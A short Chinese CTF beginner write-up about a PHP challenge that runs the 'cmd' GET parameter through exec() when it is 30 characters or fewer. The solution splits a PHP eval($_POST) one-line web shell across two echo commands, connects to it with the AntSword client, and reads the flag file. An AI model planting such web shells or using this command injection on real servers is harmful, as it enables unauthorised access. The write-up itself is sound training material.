CTF入门小练习6 --- 代码审计（2）

mind

CTF入门小练习6 --- 代码审计(2)


题目：找key

地址：http://118.195.198.108:9999

[Bash shell] 纯文本查看 复制代码

0 <?php
    header("Content-type:text/html;charset=utf-8"); 
    /*
    Hint:
    get the shell find the key；）\n";
    */
    $sandbox = '/var/www/html/sandbox/' . md5("M0rk" . $_SERVER['REMOTE_ADDR']);
    mkdir($sandbox,0777,true);
    chdir($sandbox);
    echo strlen($_GET['cmd']);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 30) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);
echo "<br /> IP : {$_SERVER['REMOTE_ADDR']}";

IP : 112.6.217.171

mind

解题：

用写一句话木马的方式，再用蚁剑链接

[Bash shell] 纯文本查看 复制代码

echo -n '<?php @eval('>1.php
echo '$_POST[p]);?>'>>1.php

链接url：

[HTML] 纯文本查看 复制代码

http://118.195.198.108:9999/sandbox/e88a247a3c3e198accf1081429e097d4/1.php

发现有个key.php,在虚拟终端中cat获取到key

[Bash shell] 纯文本查看 复制代码

cat key.php
<?php
#key3:Welc0Me From GooAnn
#